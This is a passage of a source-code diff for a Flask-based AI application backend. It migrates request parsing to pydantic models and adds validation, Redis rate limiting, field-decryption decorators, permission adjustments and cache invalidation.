"streaming" diff --git a/api/controllers/console/explore/conversation.py b/api/controllers/console/explore/conversation.py index 157d5a135b..51995b8b8a 100644 --- a/api/controllers/console/explore/conversation.py +++ b/api/controllers/console/explore/conversation.py @@ -1,9 +1,8 @@ from typing import Any -from uuid import UUID from flask import request from flask_restx import marshal_with -from pydantic import BaseModel, Field +from pydantic import BaseModel, Field, model_validator from sqlalchemy.orm import Session from werkzeug.exceptions import NotFound @@ -13,6 +12,7 @@ from controllers.console.explore.wraps import InstalledAppResource from core.app.entities.app_invoke_entities import InvokeFrom from extensions.ext_database import db from fields.conversation_fields import conversation_infinite_scroll_pagination_fields, simple_conversation_fields +from libs.helper import UUIDStrOrEmpty from libs.login import current_user from models import Account from models.model import AppMode @@ -24,15 +24,22 @@ from .. 
import console_ns class ConversationListQuery(BaseModel): - last_id: UUID | None = None + last_id: UUIDStrOrEmpty | None = None limit: int = Field(default=20, ge=1, le=100) pinned: bool | None = None class ConversationRenamePayload(BaseModel): - name: str + name: str | None = None auto_generate: bool = False + @model_validator(mode="after") + def validate_name_requirement(self): + if not self.auto_generate: + if self.name is None or not self.name.strip(): + raise ValueError("name is required when auto_generate is false") + return self + register_schema_models(console_ns, ConversationListQuery, ConversationRenamePayload) diff --git a/api/controllers/console/explore/installed_app.py b/api/controllers/console/explore/installed_app.py index 3c95779475..e42db10ba6 100644 --- a/api/controllers/console/explore/installed_app.py +++ b/api/controllers/console/explore/installed_app.py @@ -2,7 +2,8 @@ import logging from typing import Any from flask import request -from flask_restx import Resource, inputs, marshal_with, reqparse +from flask_restx import Resource, marshal_with +from pydantic import BaseModel from sqlalchemy import and_, select from werkzeug.exceptions import BadRequest, Forbidden, NotFound @@ -18,6 +19,15 @@ from services.account_service import TenantService from services.enterprise.enterprise_service import EnterpriseService from services.feature_service import FeatureService + +class InstalledAppCreatePayload(BaseModel): + app_id: str + + +class InstalledAppUpdatePayload(BaseModel): + is_pinned: bool | None = None + + logger = logging.getLogger(__name__) @@ -105,26 +115,25 @@ class InstalledAppsListApi(Resource): @account_initialization_required @cloud_edition_billing_resource_check("apps") def post(self): - parser = reqparse.RequestParser().add_argument("app_id", type=str, required=True, help="Invalid app_id") - args = parser.parse_args() + payload = InstalledAppCreatePayload.model_validate(console_ns.payload or {}) - recommended_app = db.session.query(RecommendedApp).where(RecommendedApp.app_id == args["app_id"]).first() + recommended_app = db.session.query(RecommendedApp).where(RecommendedApp.app_id == payload.app_id).first() if recommended_app is None: - raise NotFound("App not found") + raise NotFound("Recommended app not found") _, current_tenant_id = current_account_with_tenant() - app = db.session.query(App).where(App.id == args["app_id"]).first() + app = db.session.query(App).where(App.id == payload.app_id).first() if app is None: - raise NotFound("App not found") + raise NotFound("App entity not found") if not app.is_public: raise Forbidden("You can't install a non-public app") installed_app = ( db.session.query(InstalledApp) - .where(and_(InstalledApp.app_id == args["app_id"], InstalledApp.tenant_id == current_tenant_id)) + .where(and_(InstalledApp.app_id == payload.app_id, InstalledApp.tenant_id == current_tenant_id)) .first() ) @@ -133,7 +142,7 @@ class InstalledAppsListApi(Resource): recommended_app.install_count += 1 new_installed_app = InstalledApp( - app_id=args["app_id"], + app_id=payload.app_id, tenant_id=current_tenant_id, app_owner_tenant_id=app.tenant_id, is_pinned=False, @@ -163,12 +172,11 @@ class InstalledAppApi(InstalledAppResource): return {"result": "success", "message": "App uninstalled successfully"}, 204 def patch(self, installed_app): - parser = reqparse.RequestParser().add_argument("is_pinned", type=inputs.boolean) - args = parser.parse_args() + payload = InstalledAppUpdatePayload.model_validate(console_ns.payload or {}) commit_args = False - if 
"is_pinned" in args: - installed_app.is_pinned = args["is_pinned"] + if payload.is_pinned is not None: + installed_app.is_pinned = payload.is_pinned commit_args = True if commit_args: diff --git a/api/controllers/console/files.py b/api/controllers/console/files.py index fdd7c2f479..29417dc896 100644 --- a/api/controllers/console/files.py +++ b/api/controllers/console/files.py @@ -45,6 +45,9 @@ class FileApi(Resource): "video_file_size_limit": dify_config.UPLOAD_VIDEO_FILE_SIZE_LIMIT, "audio_file_size_limit": dify_config.UPLOAD_AUDIO_FILE_SIZE_LIMIT, "workflow_file_upload_limit": dify_config.WORKFLOW_FILE_UPLOAD_LIMIT, + "image_file_batch_limit": dify_config.IMAGE_FILE_BATCH_LIMIT, + "single_chunk_attachment_limit": dify_config.SINGLE_CHUNK_ATTACHMENT_LIMIT, + "attachment_image_file_size_limit": dify_config.ATTACHMENT_IMAGE_FILE_SIZE_LIMIT, }, 200 @setup_required diff --git a/api/controllers/console/tag/tags.py b/api/controllers/console/tag/tags.py index 17cfc3ff4b..e9fbb515e4 100644 --- a/api/controllers/console/tag/tags.py +++ b/api/controllers/console/tag/tags.py @@ -1,31 +1,40 @@ +from typing import Literal + from flask import request -from flask_restx import Resource, marshal_with, reqparse +from flask_restx import Resource, marshal_with +from pydantic import BaseModel, Field from werkzeug.exceptions import Forbidden +from controllers.common.schema import register_schema_models from controllers.console import console_ns from controllers.console.wraps import account_initialization_required, edit_permission_required, setup_required from fields.tag_fields import dataset_tag_fields from libs.login import current_account_with_tenant, login_required -from models.model import Tag from services.tag_service import TagService -def _validate_name(name): - if not name or len(name) < 1 or len(name) > 50: - raise ValueError("Name must be between 1 to 50 characters.") - return name +class TagBasePayload(BaseModel): + name: str = Field(description="Tag name", min_length=1, max_length=50) + type: Literal["knowledge", "app"] | None = Field(default=None, description="Tag type") -parser_tags = ( - reqparse.RequestParser() - .add_argument( - "name", - nullable=False, - required=True, - help="Name must be between 1 to 50 characters.", - type=_validate_name, - ) - .add_argument("type", type=str, location="json", choices=Tag.TAG_TYPE_LIST, nullable=True, help="Invalid tag type.") +class TagBindingPayload(BaseModel): + tag_ids: list[str] = Field(description="Tag IDs to bind") + target_id: str = Field(description="Target ID to bind tags to") + type: Literal["knowledge", "app"] | None = Field(default=None, description="Tag type") + + +class TagBindingRemovePayload(BaseModel): + tag_id: str = Field(description="Tag ID to remove") + target_id: str = Field(description="Target ID to unbind tag from") + type: Literal["knowledge", "app"] | None = Field(default=None, description="Tag type") + + +register_schema_models( + console_ns, + TagBasePayload, + TagBindingPayload, + TagBindingRemovePayload, ) @@ -43,7 +52,7 @@ class TagListApi(Resource): return tags, 200 - @console_ns.expect(parser_tags) + @console_ns.expect(console_ns.models[TagBasePayload.__name__]) @setup_required @login_required @account_initialization_required @@ -53,22 +62,17 @@ class TagListApi(Resource): if not (current_user.has_edit_permission or current_user.is_dataset_editor): raise Forbidden() - args = parser_tags.parse_args() - tag = TagService.save_tags(args) + payload = TagBasePayload.model_validate(console_ns.payload or {}) + tag = 
TagService.save_tags(payload.model_dump()) response = {"id": tag.id, "name": tag.name, "type": tag.type, "binding_count": 0} return response, 200 -parser_tag_id = reqparse.RequestParser().add_argument( - "name", nullable=False, required=True, help="Name must be between 1 to 50 characters.", type=_validate_name -) - - @console_ns.route("/tags/") class TagUpdateDeleteApi(Resource): - @console_ns.expect(parser_tag_id) + @console_ns.expect(console_ns.models[TagBasePayload.__name__]) @setup_required @login_required @account_initialization_required @@ -79,8 +83,8 @@ class TagUpdateDeleteApi(Resource): if not (current_user.has_edit_permission or current_user.is_dataset_editor): raise Forbidden() - args = parser_tag_id.parse_args() - tag = TagService.update_tags(args, tag_id) + payload = TagBasePayload.model_validate(console_ns.payload or {}) + tag = TagService.update_tags(payload.model_dump(), tag_id) binding_count = TagService.get_tag_binding_count(tag_id) @@ -100,17 +104,9 @@ class TagUpdateDeleteApi(Resource): return 204 -parser_create = ( - reqparse.RequestParser() - .add_argument("tag_ids", type=list, nullable=False, required=True, location="json", help="Tag IDs is required.") - .add_argument("target_id", type=str, nullable=False, required=True, location="json", help="Target ID is required.") - .add_argument("type", type=str, location="json", choices=Tag.TAG_TYPE_LIST, nullable=True, help="Invalid tag type.") -) - - @console_ns.route("/tag-bindings/create") class TagBindingCreateApi(Resource): - @console_ns.expect(parser_create) + @console_ns.expect(console_ns.models[TagBindingPayload.__name__]) @setup_required @login_required @account_initialization_required @@ -120,23 +116,15 @@ class TagBindingCreateApi(Resource): if not (current_user.has_edit_permission or current_user.is_dataset_editor): raise Forbidden() - args = parser_create.parse_args() - TagService.save_tag_binding(args) + payload = TagBindingPayload.model_validate(console_ns.payload or {}) + TagService.save_tag_binding(payload.model_dump()) return {"result": "success"}, 200 -parser_remove = ( - reqparse.RequestParser() - .add_argument("tag_id", type=str, nullable=False, required=True, help="Tag ID is required.") - .add_argument("target_id", type=str, nullable=False, required=True, help="Target ID is required.") - .add_argument("type", type=str, location="json", choices=Tag.TAG_TYPE_LIST, nullable=True, help="Invalid tag type.") -) - - @console_ns.route("/tag-bindings/remove") class TagBindingDeleteApi(Resource): - @console_ns.expect(parser_remove) + @console_ns.expect(console_ns.models[TagBindingRemovePayload.__name__]) @setup_required @login_required @account_initialization_required @@ -146,7 +134,7 @@ class TagBindingDeleteApi(Resource): if not (current_user.has_edit_permission or current_user.is_dataset_editor): raise Forbidden() - args = parser_remove.parse_args() - TagService.delete_tag_binding(args) + payload = TagBindingRemovePayload.model_validate(console_ns.payload or {}) + TagService.delete_tag_binding(payload.model_dump()) return {"result": "success"}, 200 diff --git a/api/controllers/console/workspace/models.py b/api/controllers/console/workspace/models.py index 246a869291..2def57ed7b 100644 --- a/api/controllers/console/workspace/models.py +++ b/api/controllers/console/workspace/models.py @@ -230,7 +230,7 @@ class ModelProviderModelApi(Resource): return {"result": "success"}, 200 - @console_ns.expect(console_ns.models[ParserDeleteModels.__name__], validate=True) + 
@console_ns.expect(console_ns.models[ParserDeleteModels.__name__]) @setup_required @login_required @is_admin_or_owner_required @@ -282,9 +282,10 @@ class ModelProviderModelCredentialApi(Resource): tenant_id=tenant_id, provider_name=provider ) else: - model_type = args.model_type + # Normalize model_type to the origin value stored in DB (e.g., "text-generation" for LLM) + normalized_model_type = args.model_type.to_origin_model_type() available_credentials = model_provider_service.provider_manager.get_provider_model_available_credentials( - tenant_id=tenant_id, provider_name=provider, model_type=model_type, model_name=args.model + tenant_id=tenant_id, provider_name=provider, model_type=normalized_model_type, model_name=args.model ) return jsonable_encoder( diff --git a/api/controllers/console/workspace/plugin.py b/api/controllers/console/workspace/plugin.py index c5624e0fc2..805058ba5a 100644 --- a/api/controllers/console/workspace/plugin.py +++ b/api/controllers/console/workspace/plugin.py @@ -46,8 +46,8 @@ class PluginDebuggingKeyApi(Resource): class ParserList(BaseModel): - page: int = Field(default=1) - page_size: int = Field(default=256) + page: int = Field(default=1, ge=1, description="Page number") + page_size: int = Field(default=256, ge=1, le=256, description="Page size (1-256)") reg(ParserList) @@ -106,8 +106,8 @@ class ParserPluginIdentifierQuery(BaseModel): class ParserTasks(BaseModel): - page: int - page_size: int + page: int = Field(default=1, ge=1, description="Page number") + page_size: int = Field(default=256, ge=1, le=256, description="Page size (1-256)") class ParserMarketplaceUpgrade(BaseModel): diff --git a/api/controllers/console/workspace/tool_providers.py b/api/controllers/console/workspace/tool_providers.py index 2c54aa5a20..a2fc45c29c 100644 --- a/api/controllers/console/workspace/tool_providers.py +++ b/api/controllers/console/workspace/tool_providers.py @@ -18,6 +18,7 @@ from controllers.console.wraps import ( setup_required, ) from core.entities.mcp_provider import MCPAuthentication, MCPConfiguration +from core.helper.tool_provider_cache import ToolProviderListCache from core.mcp.auth.auth_flow import auth, handle_callback from core.mcp.error import MCPAuthError, MCPError, MCPRefreshTokenError from core.mcp.mcp_client import MCPClient @@ -944,7 +945,7 @@ class ToolProviderMCPApi(Resource): configuration = MCPConfiguration.model_validate(args["configuration"]) authentication = MCPAuthentication.model_validate(args["authentication"]) if args["authentication"] else None - # Create provider + # Create provider in transaction with Session(db.engine) as session, session.begin(): service = MCPToolManageService(session=session) result = service.create_provider( @@ -960,7 +961,11 @@ class ToolProviderMCPApi(Resource): configuration=configuration, authentication=authentication, ) - return jsonable_encoder(result) + + # Invalidate cache AFTER transaction commits to avoid holding locks during Redis operations + ToolProviderListCache.invalidate_cache(tenant_id) + + return jsonable_encoder(result) @console_ns.expect(parser_mcp_put) @setup_required @@ -972,17 +977,23 @@ class ToolProviderMCPApi(Resource): authentication = MCPAuthentication.model_validate(args["authentication"]) if args["authentication"] else None _, current_tenant_id = current_account_with_tenant() - # Step 1: Validate server URL change if needed (includes URL format validation and network operation) - validation_result = None + # Step 1: Get provider data for URL validation (short-lived session, no network 
I/O) + validation_data = None with Session(db.engine) as session: service = MCPToolManageService(session=session) - validation_result = service.validate_server_url_change( - tenant_id=current_tenant_id, provider_id=args["provider_id"], new_server_url=args["server_url"] + validation_data = service.get_provider_for_url_validation( + tenant_id=current_tenant_id, provider_id=args["provider_id"] ) - # No need to check for errors here, exceptions will be raised directly + # Step 2: Perform URL validation with network I/O OUTSIDE of any database session + # This prevents holding database locks during potentially slow network operations + validation_result = MCPToolManageService.validate_server_url_standalone( + tenant_id=current_tenant_id, + new_server_url=args["server_url"], + validation_data=validation_data, + ) - # Step 2: Perform database update in a transaction + # Step 3: Perform database update in a transaction with Session(db.engine) as session, session.begin(): service = MCPToolManageService(session=session) service.update_provider( @@ -999,7 +1010,11 @@ class ToolProviderMCPApi(Resource): authentication=authentication, validation_result=validation_result, ) - return {"result": "success"} + + # Invalidate cache AFTER transaction commits to avoid holding locks during Redis operations + ToolProviderListCache.invalidate_cache(current_tenant_id) + + return {"result": "success"} @console_ns.expect(parser_mcp_delete) @setup_required @@ -1012,7 +1027,11 @@ class ToolProviderMCPApi(Resource): with Session(db.engine) as session, session.begin(): service = MCPToolManageService(session=session) service.delete_provider(tenant_id=current_tenant_id, provider_id=args["provider_id"]) - return {"result": "success"} + + # Invalidate cache AFTER transaction commits to avoid holding locks during Redis operations + ToolProviderListCache.invalidate_cache(current_tenant_id) + + return {"result": "success"} parser_auth = ( diff --git a/api/controllers/console/workspace/trigger_providers.py b/api/controllers/console/workspace/trigger_providers.py index 69281c6214..268473d6d1 100644 --- a/api/controllers/console/workspace/trigger_providers.py +++ b/api/controllers/console/workspace/trigger_providers.py @@ -22,7 +22,12 @@ from services.trigger.trigger_subscription_builder_service import TriggerSubscri from services.trigger.trigger_subscription_operator_service import TriggerSubscriptionOperatorService from .. 
import console_ns -from ..wraps import account_initialization_required, is_admin_or_owner_required, setup_required +from ..wraps import ( + account_initialization_required, + edit_permission_required, + is_admin_or_owner_required, + setup_required, +) logger = logging.getLogger(__name__) @@ -72,7 +77,7 @@ class TriggerProviderInfoApi(Resource): class TriggerSubscriptionListApi(Resource): @setup_required @login_required - @is_admin_or_owner_required + @edit_permission_required @account_initialization_required def get(self, provider): """List all trigger subscriptions for the current tenant's provider""" @@ -104,7 +109,7 @@ class TriggerSubscriptionBuilderCreateApi(Resource): @console_ns.expect(parser) @setup_required @login_required - @is_admin_or_owner_required + @edit_permission_required @account_initialization_required def post(self, provider): """Add a new subscription instance for a trigger provider""" @@ -133,6 +138,7 @@ class TriggerSubscriptionBuilderCreateApi(Resource): class TriggerSubscriptionBuilderGetApi(Resource): @setup_required @login_required + @edit_permission_required @account_initialization_required def get(self, provider, subscription_builder_id): """Get a subscription instance for a trigger provider""" @@ -155,7 +161,7 @@ class TriggerSubscriptionBuilderVerifyApi(Resource): @console_ns.expect(parser_api) @setup_required @login_required - @is_admin_or_owner_required + @edit_permission_required @account_initialization_required def post(self, provider, subscription_builder_id): """Verify a subscription instance for a trigger provider""" @@ -200,6 +206,7 @@ class TriggerSubscriptionBuilderUpdateApi(Resource): @console_ns.expect(parser_update_api) @setup_required @login_required + @edit_permission_required @account_initialization_required def post(self, provider, subscription_builder_id): """Update a subscription instance for a trigger provider""" @@ -233,6 +240,7 @@ class TriggerSubscriptionBuilderUpdateApi(Resource): class TriggerSubscriptionBuilderLogsApi(Resource): @setup_required @login_required + @edit_permission_required @account_initialization_required def get(self, provider, subscription_builder_id): """Get the request logs for a subscription instance for a trigger provider""" @@ -255,7 +263,7 @@ class TriggerSubscriptionBuilderBuildApi(Resource): @console_ns.expect(parser_update_api) @setup_required @login_required - @is_admin_or_owner_required + @edit_permission_required @account_initialization_required def post(self, provider, subscription_builder_id): """Build a subscription instance for a trigger provider""" diff --git a/api/controllers/console/wraps.py b/api/controllers/console/wraps.py index f40f566a36..95fc006a12 100644 --- a/api/controllers/console/wraps.py +++ b/api/controllers/console/wraps.py @@ -9,10 +9,12 @@ from typing import ParamSpec, TypeVar from flask import abort, request from configs import dify_config +from controllers.console.auth.error import AuthenticationFailedError, EmailCodeError from controllers.console.workspace.error import AccountNotInitializedError from enums.cloud_plan import CloudPlan from extensions.ext_database import db from extensions.ext_redis import redis_client +from libs.encryption import FieldEncryption from libs.login import current_account_with_tenant from models.account import AccountStatus from models.dataset import RateLimitLog @@ -25,6 +27,14 @@ from .error import NotInitValidateError, NotSetupError, UnauthorizedAndForceLogo P = ParamSpec("P") R = TypeVar("R") +# Field names for decryption +FIELD_NAME_PASSWORD = 
"password" +FIELD_NAME_CODE = "code" + +# Error messages for decryption failures +ERROR_MSG_INVALID_ENCRYPTED_DATA = "Invalid encrypted data" +ERROR_MSG_INVALID_ENCRYPTED_CODE = "Invalid encrypted code" + def account_initialization_required(view: Callable[P, R]): @wraps(view) @@ -331,3 +341,163 @@ def is_admin_or_owner_required(f: Callable[P, R]): return f(*args, **kwargs) return decorated_function + + +def annotation_import_rate_limit(view: Callable[P, R]): + """ + Rate limiting decorator for annotation import operations. + + Implements sliding window rate limiting with two tiers: + - Short-term: Configurable requests per minute (default: 5) + - Long-term: Configurable requests per hour (default: 20) + + Uses Redis ZSET for distributed rate limiting across multiple instances. + """ + + @wraps(view) + def decorated(*args: P.args, **kwargs: P.kwargs): + _, current_tenant_id = current_account_with_tenant() + current_time = int(time.time() * 1000) + + # Check per-minute rate limit + minute_key = f"annotation_import_rate_limit:{current_tenant_id}:1min" + redis_client.zadd(minute_key, {current_time: current_time}) + redis_client.zremrangebyscore(minute_key, 0, current_time - 60000) + minute_count = redis_client.zcard(minute_key) + redis_client.expire(minute_key, 120) # 2 minutes TTL + + if minute_count > dify_config.ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE: + abort( + 429, + f"Too many annotation import requests. Maximum {dify_config.ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE} " + f"requests per minute allowed. Please try again later.", + ) + + # Check per-hour rate limit + hour_key = f"annotation_import_rate_limit:{current_tenant_id}:1hour" + redis_client.zadd(hour_key, {current_time: current_time}) + redis_client.zremrangebyscore(hour_key, 0, current_time - 3600000) + hour_count = redis_client.zcard(hour_key) + redis_client.expire(hour_key, 7200) # 2 hours TTL + + if hour_count > dify_config.ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR: + abort( + 429, + f"Too many annotation import requests. Maximum {dify_config.ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR} " + f"requests per hour allowed. Please try again later.", + ) + + return view(*args, **kwargs) + + return decorated + + +def annotation_import_concurrency_limit(view: Callable[P, R]): + """ + Concurrency control decorator for annotation import operations. + + Limits the number of concurrent import tasks per tenant to prevent + resource exhaustion and ensure fair resource allocation. + + Uses Redis ZSET to track active import jobs with automatic cleanup + of stale entries (jobs older than 2 minutes). + """ + + @wraps(view) + def decorated(*args: P.args, **kwargs: P.kwargs): + _, current_tenant_id = current_account_with_tenant() + current_time = int(time.time() * 1000) + + active_jobs_key = f"annotation_import_active:{current_tenant_id}" + + # Clean up stale entries (jobs that should have completed or timed out) + stale_threshold = current_time - 120000 # 2 minutes ago + redis_client.zremrangebyscore(active_jobs_key, 0, stale_threshold) + + # Check current active job count + active_count = redis_client.zcard(active_jobs_key) + + if active_count >= dify_config.ANNOTATION_IMPORT_MAX_CONCURRENT: + abort( + 429, + f"Too many concurrent import tasks. Maximum {dify_config.ANNOTATION_IMPORT_MAX_CONCURRENT} " + f"concurrent imports allowed per workspace. 
Please wait for existing imports to complete.", + ) + + # Allow the request to proceed + # The actual job registration will happen in the service layer + return view(*args, **kwargs) + + return decorated + + +def _decrypt_field(field_name: str, error_class: type[Exception], error_message: str) -> None: + """ + Helper to decrypt a Base64-encoded encrypted field in the request payload. + + Args: + field_name: Name of the field to decrypt + error_class: Exception class to raise on decryption failure + error_message: Error message to include in the exception + """ + if not request or not request.is_json: + return + # Get the payload dict - it's cached and mutable + payload = request.get_json() + if not payload or field_name not in payload: + return + encoded_value = payload[field_name] + decoded_value = FieldEncryption.decrypt_field(encoded_value) + + # If decryption failed, raise the error immediately + if decoded_value is None: + raise error_class(error_message) + + # Update payload dict in-place with the decrypted value + # Since payload is a mutable dict and get_json() returns the cached reference, + # modifying it will affect all subsequent accesses including console_ns.payload + payload[field_name] = decoded_value + + +def decrypt_password_field(view: Callable[P, R]): + """ + Decorator to decrypt the password field in the request payload. + + Automatically decrypts the 'password' field if encryption is enabled. + If decryption fails, raises AuthenticationFailedError. + + Usage: + @decrypt_password_field + def post(self): + args = LoginPayload.model_validate(console_ns.payload) + # args.password is now decrypted + """ + + @wraps(view) + def decorated(*args: P.args, **kwargs: P.kwargs): + _decrypt_field(FIELD_NAME_PASSWORD, AuthenticationFailedError, ERROR_MSG_INVALID_ENCRYPTED_DATA) + return view(*args, **kwargs) + + return decorated + + +def decrypt_code_field(view: Callable[P, R]): + """ + Decorator to decrypt the verification code field in the request payload. + + Automatically decrypts the 'code' field if encryption is enabled. + If decryption fails, raises EmailCodeError.
+ + Usage: + @decrypt_code_field + def post(self): + args = EmailCodeLoginPayload.model_validate(console_ns.payload) + # args.code is now decrypted + """ + + @wraps(view) + def decorated(*args: P.args, **kwargs: P.kwargs): + _decrypt_field(FIELD_NAME_CODE, EmailCodeError, ERROR_MSG_INVALID_ENCRYPTED_CODE) + return view(*args, **kwargs) + + return decorated diff --git a/api/controllers/service_api/app/completion.py b/api/controllers/service_api/app/completion.py index a037fe9254..b3836f3a47 100644 --- a/api/controllers/service_api/app/completion.py +++ b/api/controllers/service_api/app/completion.py @@ -4,7 +4,7 @@ from uuid import UUID from flask import request from flask_restx import Resource -from pydantic import BaseModel, Field +from pydantic import BaseModel, Field, field_validator from werkzeug.exceptions import BadRequest, InternalServerError, NotFound import services @@ -52,11 +52,26 @@ class ChatRequestPayload(BaseModel): query: str files: list[dict[str, Any]] | None = None response_mode: Literal["blocking", "streaming"] | None = None - conversation_id: UUID | None = None + conversation_id: str | None = Field(default=None, description="Conversation UUID") retriever_from: str = Field(default="dev") auto_generate_name: bool = Field(default=True, description="Auto generate conversation name") workflow_id: str | None = Field(default=None, description="Workflow ID for advanced chat") + @field_validator("conversation_id", mode="before") + @classmethod + def normalize_conversation_id(cls, value: str | UUID | None) -> str | None: + """Allow missing or blank conversation IDs; enforce UUID format when provided.""" + if isinstance(value, str): + value = value.strip() + + if not value: + return None + + try: + return helper.uuid_value(value) + except ValueError as exc: + raise ValueError("conversation_id must be a valid UUID") from exc + register_schema_models(service_api_ns, CompletionRequestPayload, ChatRequestPayload) diff --git a/api/controllers/service_api/app/conversation.py b/api/controllers/service_api/app/conversation.py index 724ad3448d..be6d837032 100644 --- a/api/controllers/service_api/app/conversation.py +++ b/api/controllers/service_api/app/conversation.py @@ -4,7 +4,7 @@ from uuid import UUID from flask import request from flask_restx import Resource from flask_restx._http import HTTPStatus -from pydantic import BaseModel, Field +from pydantic import BaseModel, Field, model_validator from sqlalchemy.orm import Session from werkzeug.exceptions import BadRequest, NotFound @@ -37,9 +37,16 @@ class ConversationListQuery(BaseModel): class ConversationRenamePayload(BaseModel): - name: str = Field(description="New conversation name") + name: str | None = Field(default=None, description="New conversation name (required if auto_generate is false)") auto_generate: bool = Field(default=False, description="Auto-generate conversation name") + @model_validator(mode="after") + def validate_name_requirement(self): + if not self.auto_generate: + if self.name is None or not self.name.strip(): + raise ValueError("name is required when auto_generate is false") + return self + class ConversationVariablesQuery(BaseModel): last_id: UUID | None = Field(default=None, description="Last variable ID for pagination") diff --git a/api/controllers/service_api/dataset/dataset.py b/api/controllers/service_api/dataset/dataset.py index 7692aeed23..4f91f40c55 100644 --- a/api/controllers/service_api/dataset/dataset.py +++ b/api/controllers/service_api/dataset/dataset.py @@ -49,7 +49,7 @@ class 
DatasetUpdatePayload(BaseModel): embedding_model: str | None = None embedding_model_provider: str | None = None retrieval_model: RetrievalModel | None = None - partial_member_list: list[str] | None = None + partial_member_list: list[dict[str, str]] | None = None external_retrieval_model: dict[str, Any] | None = None external_knowledge_id: str | None = None external_knowledge_api_id: str | None = None diff --git a/api/controllers/trigger/trigger.py b/api/controllers/trigger/trigger.py index e69b22d880..c10b94050c 100644 --- a/api/controllers/trigger/trigger.py +++ b/api/controllers/trigger/trigger.py @@ -33,7 +33,7 @@ def trigger_endpoint(endpoint_id: str): if response: break if not response: - logger.error("Endpoint not found for {endpoint_id}") + logger.info("Endpoint not found for %s", endpoint_id) return jsonify({"error": "Endpoint not found"}), 404 return response except ValueError as e: diff --git a/api/controllers/web/audio.py b/api/controllers/web/audio.py index b9fef48c4d..15828cc208 100644 --- a/api/controllers/web/audio.py +++ b/api/controllers/web/audio.py @@ -1,7 +1,8 @@ import logging from flask import request -from flask_restx import fields, marshal_with, reqparse +from flask_restx import fields, marshal_with +from pydantic import BaseModel, field_validator from werkzeug.exceptions import InternalServerError import services @@ -20,6 +21,7 @@ from controllers.web.error import ( from controllers.web.wraps import WebApiResource from core.errors.error import ModelCurrentlyNotSupportError, ProviderTokenNotInitError, QuotaExceededError from core.model_runtime.errors.invoke import InvokeError +from libs.helper import uuid_value from models.model import App from services.audio_service import AudioService from services.errors.audio import ( @@ -29,6 +31,25 @@ from services.errors.audio import ( UnsupportedAudioTypeServiceError, ) +from ..common.schema import register_schema_models + + +class TextToAudioPayload(BaseModel): + message_id: str | None = None + voice: str | None = None + text: str | None = None + streaming: bool | None = None + + @field_validator("message_id") + @classmethod + def validate_message_id(cls, value: str | None) -> str | None: + if value is None: + return value + return uuid_value(value) + + +register_schema_models(web_ns, TextToAudioPayload) + logger = logging.getLogger(__name__) @@ -88,6 +109,7 @@ class AudioApi(WebApiResource): @web_ns.route("/text-to-audio") class TextApi(WebApiResource): + @web_ns.expect(web_ns.models[TextToAudioPayload.__name__]) @web_ns.doc("Text to Audio") @web_ns.doc(description="Convert text to audio using text-to-speech service.") @web_ns.doc( @@ -102,18 +124,11 @@ class TextApi(WebApiResource): def post(self, app_model: App, end_user): """Convert text to audio""" try: - parser = ( - reqparse.RequestParser() - .add_argument("message_id", type=str, required=False, location="json") - .add_argument("voice", type=str, location="json") - .add_argument("text", type=str, location="json") - .add_argument("streaming", type=bool, location="json") - ) - args = parser.parse_args() + payload = TextToAudioPayload.model_validate(web_ns.payload or {}) - message_id = args.get("message_id", None) - text = args.get("text", None) - voice = args.get("voice", None) + message_id = payload.message_id + text = payload.text + voice = payload.voice response = AudioService.transcript_tts( app_model=app_model, text=text, voice=voice, end_user=end_user.external_user_id, message_id=message_id ) diff --git a/api/controllers/web/completion.py 
b/api/controllers/web/completion.py index e8a4698375..a97d745471 100644 --- a/api/controllers/web/completion.py +++ b/api/controllers/web/completion.py @@ -1,9 +1,11 @@ import logging +from typing import Any, Literal -from flask_restx import reqparse +from pydantic import BaseModel, Field, field_validator from werkzeug.exceptions import InternalServerError, NotFound import services +from controllers.common.schema import register_schema_models from controllers.web import web_ns from controllers.web.error import ( AppUnavailableError, @@ -34,25 +36,44 @@ from services.errors.llm import InvokeRateLimitError logger = logging.getLogger(__name__) +class CompletionMessagePayload(BaseModel): + inputs: dict[str, Any] = Field(description="Input variables for the completion") + query: str = Field(default="", description="Query text for completion") + files: list[dict[str, Any]] | None = Field(default=None, description="Files to be processed") + response_mode: Literal["blocking", "streaming"] | None = Field( + default=None, description="Response mode: blocking or streaming" + ) + retriever_from: str = Field(default="web_app", description="Source of retriever") + + +class ChatMessagePayload(BaseModel): + inputs: dict[str, Any] = Field(description="Input variables for the chat") + query: str = Field(description="User query/message") + files: list[dict[str, Any]] | None = Field(default=None, description="Files to be processed") + response_mode: Literal["blocking", "streaming"] | None = Field( + default=None, description="Response mode: blocking or streaming" + ) + conversation_id: str | None = Field(default=None, description="Conversation ID") + parent_message_id: str | None = Field(default=None, description="Parent message ID") + retriever_from: str = Field(default="web_app", description="Source of retriever") + + @field_validator("conversation_id", "parent_message_id") + @classmethod + def validate_uuid(cls, value: str | None) -> str | None: + if value is None: + return value + return uuid_value(value) + + +register_schema_models(web_ns, CompletionMessagePayload, ChatMessagePayload) + + # define completion api for user @web_ns.route("/completion-messages") class CompletionApi(WebApiResource): @web_ns.doc("Create Completion Message") @web_ns.doc(description="Create a completion message for text generation applications.") - @web_ns.doc( - params={ - "inputs": {"description": "Input variables for the completion", "type": "object", "required": True}, - "query": {"description": "Query text for completion", "type": "string", "required": False}, - "files": {"description": "Files to be processed", "type": "array", "required": False}, - "response_mode": { - "description": "Response mode: blocking or streaming", - "type": "string", - "enum": ["blocking", "streaming"], - "required": False, - }, - "retriever_from": {"description": "Source of retriever", "type": "string", "required": False}, - } - ) + @web_ns.expect(web_ns.models[CompletionMessagePayload.__name__]) @web_ns.doc( responses={ 200: "Success", @@ -67,18 +88,10 @@ class CompletionApi(WebApiResource): if app_model.mode != AppMode.COMPLETION: raise NotCompletionAppError() - parser = ( - reqparse.RequestParser() - .add_argument("inputs", type=dict, required=True, location="json") - .add_argument("query", type=str, location="json", default="") - .add_argument("files", type=list, required=False, location="json") - .add_argument("response_mode", type=str, choices=["blocking", "streaming"], location="json") - .add_argument("retriever_from", type=str, 
